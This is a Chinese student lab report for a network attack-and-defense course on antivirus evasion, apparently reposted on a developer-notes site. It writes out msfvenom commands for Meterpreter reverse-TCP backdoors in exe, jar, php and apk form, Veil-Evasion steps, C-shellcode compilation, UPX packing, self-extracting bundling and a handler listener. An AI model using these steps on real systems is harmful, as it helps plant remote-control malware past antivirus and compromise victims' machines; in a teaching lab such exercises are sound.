热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

20192020220174325叶竞蔚《网络对抗技术》Exp3免杀原理与实践

实验内容正确使用msf编码器msfvenom生成如jar之类的其他文件veil加壳工具使用C+shellcode编程使用其他课堂未介绍

实验内容

正确使用msf编码器

 msfvenom生成如jar之类的其他文件

veil

加壳工具

使用C + shellcode编程

使用其他课堂未介绍方法

通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

 

基础知识

杀软是如何检测出恶意代码的?

一般分为:

1 基于特征码的检测

特征码即一段或多段数据,包含这样数据的可执行文件或其他库、脚本被认为是恶意代码。

2 基于启发式恶意软件检测

根据片面特征推断,通用的、多特征、非精确的扫描。

3 基于行为的恶意软件检测

启发式的一种,加入了行为监控。

免杀是做什么?

对程序软件进行伪装处理让其不受到杀毒软件的检测和查杀。

免杀的基本方法有哪些?

1 改变特征码

如果你手里只有EXE

加壳:压缩壳、加密壳

有shellcode(像Meterpreter)

用encode进行编码、基于payload重新编译生成可执行文件 

有源代码

用其他语言进行重写再编译(veil-evasion)

2 改变行为

通讯方式

尽量使用反弹式连接、使用隧道技术、加密通讯数据

操作模式

基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

3 开启杀软能绝对防止电脑中恶意代码吗?

不能。每一个杀软也会有自己的漏洞而恶意代码我们目前已知的也为数不多,但计算机的研究和黑客可以施展的空间是很大的,而且在此次实验中我们能发现每一次检测的杀软数是不同的,因此可以知道不同的恶意软件也并不是所有杀软都能够发现,因此开启杀软不一定能防止所有恶意代码。

实验步骤

任务一正确使用msf编码器

用实验二中已经生成的后门程序20174325_backdoor在VirusTotal和Virscan这两个网站对生成的后门程序进行扫描。因为Virscan扫描的文件名不能包含数字,修改为aliengirlyz_backdoor。

我用的是VirusTotal进行扫描,结果:技术图片

由于一直在加载中,故我先选择了用minimal interface,扫描结果技术图片

74个杀软中58个报出病毒,此时不加任何处理的后门程序大多数杀毒软件都可以检测到,于是采取msf编码进行修改。

在kali终端输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00‘ LHOST=192.168.31.200 LPORT=4325 -f exe > met-encoded.exe来进行一次编码技术图片

扫描结果:技术图片

少了两个杀软。

使用-i设置编码次数,进行十次编码,输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.31.200 LPORT=4325 -f exe > met-encoded10.exe技术图片

扫描结果:技术图片

无变化。

任务二msfvenom生成如jar之类的其他文件

输入命令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.31.200 LPORT=4325 x> aliengirlyz_backdoor_java.jar生成java后门程序技术图片

扫描结果:

技术图片

相比较exe,jar格式少了较多杀软与报出。

输入msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.200 LPORT=4325 x> aliengirlyz_php_backdoor.php生成php后门程序技术图片

扫描结果:技术图片

杀软比exe少比jar多,但报出比前两者更少。

输入msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.200 LPORT=4325 x> aliengirlyz_android_backdoor.apk生成apk后门文件技术图片

扫描结果:技术图片

杀软和报出都增多。

任务三veil

输入sudo veil进入veil主菜单

技术图片

输入use evasion进入veil evasion

 输入list查看全部payload

技术图片技术图片

 输入use 7选择第7个技术图片

输入-set LHOST 192.168.1.104设置反弹连接IP

输入-set LPORT 4325设置端口4325

输入-options查看设置技术图片

payload设置完毕。

输入generate生成后门文件

输入20174325_veil_backdoor设置后门文件名技术图片

输入exit退出veil

用virustotal扫描,结果:技术图片

72个杀软,47报出。

后门回连测试

在msf控制台监听发往本机(kali)4325端口的连接,在Windows上运行后门。技术图片

发现此后门未能逃过杀毒软件的监测。对此选择信任,然后连接成功建立。技术图片

回连成功。

任务四加壳工具

任务五使用C + shellcode编程

加壳工具主要在任务五生成exe文件后使用故我把两个任务放在了一个部分

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.200 LPORT=4325 -f c生成一段shellcode技术图片

 新建一个shellcode_4325.c文件,输入vim shellcode_4325.c进行编辑,把刚得到的shellcode数组拷贝进去,并增加一个main函数。技术图片

输入i686-w64-mingw32-g++ shellcode_4325.c -o shellcode_4325.exe将c程序编译为可执行文件

扫描,结果:

技术图片技术图片

输入upx shellcode_4325.exe -o upxed_shellcode_174325.exe给文件加upx壳技术图片

技术图片

扫描,结果:

技术图片

任务六使用其他课堂未介绍方法

 将后门文件与要捆绑的文件放在同一个文件夹下

 压缩文件夹,更改压缩参数,勾选创建自解压文件,依次选择高级->自解压选项->模式,选择全部隐藏技术图片技术图片

扫描,结果:技术图片

任务七通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

c+shellcode加壳捆绑技术图片

任务八用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

输入msfconsole

输入use exploit/multi/handler

输入set payload windows/meterpreter/reverse_tcp

输入set LHOST 192.168.31.200

输入set LPORT 4325

输入exploit技术图片

在win中运行技术图片

开启杀毒软件

技术图片

电脑扫描技术图片

实验完成。

实验心得

此次实验面临的最大的一个问题是veil的安装,首先是在我自己的电脑中是一直安装失败,于是重新用了一个win系统电脑单独完成第三步,任务一二较为顺利简单,任务四里的shellcode在从c文件变为可执行文件的时候也遇到了问题kali报错未找到命令,在这里停摆了较长时间技术图片但最后尝试了下载、安装、更新之后操作成功且实现了加压缩壳,在任务七通过组合任务实现免杀中用了上一步任务中加了壳的程序文件再进行c+shellcode加壳捆绑来检测,此次实验中还有一些小麻烦比如:virustotal和viruscan经常会打不开或者出错

技术图片

所以经常会换着用。最后一个任务遇到的麻烦主要是重新打开win虚拟机之后和kali的连接上面出了一些问题于是相当于把实验二后面的步骤重新又做了一遍重新建立了一个两者之间的后门软件然后监听、连接、检测。总的来说,实验完成。

2019-2020-2 20174325叶竞蔚 《网络对抗技术》Exp3免杀原理与实践


推荐阅读
  • 在CentOS 7环境中安装配置Redis及使用Redis Desktop Manager连接时的注意事项与技巧
    在 CentOS 7 环境中安装和配置 Redis 时,需要注意一些关键步骤和最佳实践。本文详细介绍了从安装 Redis 到配置其基本参数的全过程,并提供了使用 Redis Desktop Manager 连接 Redis 服务器的技巧和注意事项。此外,还探讨了如何优化性能和确保数据安全,帮助用户在生产环境中高效地管理和使用 Redis。 ... [详细]
  • 您的数据库配置是否安全?DBSAT工具助您一臂之力!
    本文探讨了Oracle提供的免费工具DBSAT,该工具能够有效协助用户检测和优化数据库配置的安全性。通过全面的分析和报告,DBSAT帮助用户识别潜在的安全漏洞,并提供针对性的改进建议,确保数据库系统的稳定性和安全性。 ... [详细]
  • CSS 百分比单位的取值依据是什么
    本文详细探讨了 CSS 中百分比单位的取值依据,包括不同定位方式下的包含块概念及其应用。通过具体的示例和代码,帮助读者更好地理解和掌握这一知识点。 ... [详细]
  • 兆芯X86 CPU架构的演进与现状(国产CPU系列)
    本文详细介绍了兆芯X86 CPU架构的发展历程,从公司成立背景到关键技术授权,再到具体芯片架构的演进,全面解析了兆芯在国产CPU领域的贡献与挑战。 ... [详细]
  • malloc 是 C 语言中的一个标准库函数,全称为 memory allocation,即动态内存分配。它用于在程序运行时申请一块指定大小的连续内存区域,并返回该区域的起始地址。当无法预先确定内存的具体位置时,可以通过 malloc 动态分配内存。 ... [详细]
  • 本文详细介绍了Linux系统中用于管理IPC(Inter-Process Communication)资源的两个重要命令:ipcs和ipcrm。通过这些命令,用户可以查看和删除系统中的消息队列、共享内存和信号量。 ... [详细]
  • LDAP服务器配置与管理
    本文介绍如何通过安装和配置SSSD服务来统一管理用户账户信息,并实现其他系统的登录调用。通过图形化交互界面配置LDAP服务器,确保用户账户信息的集中管理和安全访问。 ... [详细]
  • 如果应用程序经常播放密集、急促而又短暂的音效(如游戏音效)那么使用MediaPlayer显得有些不太适合了。因为MediaPlayer存在如下缺点:1)延时时间较长,且资源占用率高 ... [详细]
  • 网络爬虫的规范与限制
    本文探讨了网络爬虫引发的问题及其解决方案,重点介绍了Robots协议的作用和使用方法,旨在为网络爬虫的合理使用提供指导。 ... [详细]
  • 单片微机原理P3:80C51外部拓展系统
      外部拓展其实是个相对来说很好玩的章节,可以真正开始用单片机写程序了,比较重要的是外部存储器拓展,81C55拓展,矩阵键盘,动态显示,DAC和ADC。0.IO接口电路概念与存 ... [详细]
  • 自定义滚动条美化页面内容
    当页面内容超出显示范围时,为了提升用户体验和页面美观,通常会添加滚动条。如果默认的浏览器滚动条无法满足设计需求,我们可以自定义一个符合要求的滚动条。本文将详细介绍自定义滚动条的实现过程。 ... [详细]
  • importpymysql#一、直接连接mysql数据库'''coonpymysql.connect(host'192.168.*.*',u ... [详细]
  • 微软推出Windows Terminal Preview v0.10
    微软近期发布了Windows Terminal Preview v0.10,用户可以在微软商店或GitHub上获取这一更新。该版本在2月份发布的v0.9基础上,新增了鼠标输入和复制Pane等功能。 ... [详细]
  • 解决Bootstrap DataTable Ajax请求重复问题
    在最近的一个项目中,我们使用了JQuery DataTable进行数据展示,虽然使用起来非常方便,但在测试过程中发现了一个问题:当查询条件改变时,有时查询结果的数据不正确。通过FireBug调试发现,点击搜索按钮时,会发送两次Ajax请求,一次是原条件的请求,一次是新条件的请求。 ... [详细]
  • SecureCRT是一款功能强大的终端仿真软件,支持SSH1和SSH2协议,适用于在Windows环境下高效连接和管理Linux服务器。该工具不仅提供了稳定的连接性能,还具备丰富的配置选项,能够满足不同用户的需求。通过SecureCRT,用户可以轻松实现对远程Linux系统的安全访问和操作。 ... [详细]
author-avatar
mobiledu2502905597
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有